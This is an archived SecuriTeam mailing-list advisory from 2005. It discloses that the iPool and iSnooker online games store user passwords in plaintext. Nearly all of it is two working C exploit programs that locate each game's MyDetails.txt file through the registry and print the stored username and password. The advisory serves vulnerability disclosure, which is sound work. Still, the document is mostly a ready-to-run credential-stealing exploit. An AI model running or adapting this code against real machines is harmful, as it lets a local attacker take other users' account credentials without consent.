[EXPL] iPool and iSnooker Local Password Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/05
- Previous message: SecuriTeam: "[REVS] Antidebugging For (M)asses - Protecting the Enviroment"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 17 Mar 2005 11:52:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
iPool and iSnooker Local Password Disclosure
------------------------------------------------------------------------
SUMMARY
<http://www.thepoolclub.com> iPool and <http://www.thesnookerclub.com>
iSnooker are an online pool/snooker game. iPool and iSnooker store
passwords of users in plaintext, this allows a local attacker to read the
passwords from the registry.
DETAILS
Exploit (iPool) :
/*************************************************************
iPool <= v1.6.81 Local Password Disclosure Exploit by Kozan
Application: iPool 1.6.81
Vendor:
Memir Software - memirsoftware.com and
The Pool Club - thepoolclub.com
Vulnerable Description:
iPool 1.6.81 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
**************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",0, KEY_QUERY_VALUE, &hKey)
== ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL, (LPBYTE)
prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) {
RegCloseKey(hKey);
printf("An error occured. Can't get password!\n");
return -1;
}
RegCloseKey(hKey);
}
else
{
printf("An error occured. Can't get password!\n");
return -1;
}
printf("\n\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("kozan at netmagister\n");
printf("www.netmagister.com - www.spyinstructors.com\n\n");
char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];
strcpy(pwdfile,strcat(prgfiles,"\\ThePoolClub\\iPool\\MyDetails.txt"));
int addr, i, y;
FILE *fp;
char ch[100], ch2[100];
if((fp=fopen(pwdfile,"rb")) == NULL)
{
printf("An error occured. Can't get password!\n");
return -1;
}
fseek(fp,0,0);
for(i=0;i<30;i++)
{
ch[i]=getc(fp);
if(ch[i]==0x0D)
{
ch[i]=NULL;
strcpy(username,ch);
break;
}
}
addr = ftell(fp);
fseek(fp,addr+1,0);
for(y=0;y<30;y++)
{
ch2[y]=getc(fp);
if(ch2[y]==0x0D)
{
ch2[y]=NULL;
strcpy(password,ch2);
break;
}
}
fclose(fp);
printf("Username : %s\n",username);
printf("Password : %s\n",password);
return 0;
}
Exploit (iSnooker):
/*****************************************************************
iSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan
Application: iSnooker 1.6.8
Vendor:
Memir Software - memirsoftware.com and
The Snooker Club - thesnookerclub.com
Vulnerable Description:
iSnooker 1.6.8 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan at netmagister
*****************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL,
NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen >
BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured. Can't get
password!\n");
return -1;
}
RegCloseKey(hKey);
}
else
{
printf("An error occured. Can't get password!\n");
return -1;
}
printf("\n\niSnooker 1.6.8 Local Password Disclosure Exploit by
Kozan\n");
printf("Credits to ATmaCA\n");
printf("kozan@netmagister.com\n");
printf("www.netmagister.com - www.spyinstructors.com\n\n");
char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];
strcpy(pwdfile,strcat(prgfiles,"\\TheSnookerClub\\iSnooker\\MyDetails.txt"));
int addr, i, y;
FILE *fp;
char ch[100], ch2[100];
if((fp=fopen(pwdfile,"rb")) == NULL)
{
printf("An error occured. Can't get password!\n");
return -1;
}
fseek(fp,0,0);
for(i=0;i<30;i++)
{
ch[i]=getc(fp);
if(ch[i]==0x0D)
{
ch[i]=NULL;
strcpy(username,ch);
break;
}
}
addr = ftell(fp);
fseek(fp,addr+1,0);
for(y=0;y<30;y++)
{
ch2[y]=getc(fp);
if(ch2[y]==0x0D)
{
ch2[y]=NULL;
strcpy(password,ch2);
break;
}
}
fclose(fp);
printf("Username : %s\n",username);
printf("Password : %s\n",password);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kozan@netmagister.com>
ATmaCA.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[REVS] Antidebugging For (M)asses - Protecting the Enviroment"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
